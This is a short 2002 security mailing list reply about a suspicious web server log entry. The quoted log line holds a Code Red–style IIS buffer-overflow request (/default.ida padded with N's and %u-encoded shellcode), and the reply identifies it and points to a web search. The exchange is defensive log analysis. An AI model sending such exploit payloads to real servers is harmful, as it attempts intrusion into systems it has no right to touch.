Re: [suse-security] Re: **maillist-work:: Re: [suse-security] doe s anybody know such a log
Miguel Albuquerque
Hi,
What about this: schebish.c.crosslink.net - - [11/Oct/2002:17:02:57 +0200] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 329 ??
A buffer overflow aimed at a legacy API in IIS if I recall correctly (probably Code Red). Really, you should try a search with Google: http://www.google.com/search?hl=en&ie=ISO-8859-1&q=%2Fdefault.ida%3FNNNNNNNN &btnG=Google+Search In other words, I pasted "/default.ida?NNNNNN" into the search window. It *is* that easy... -- Fred Morris m3047@inwa.net
participants (1)
-
m3047@inwa.net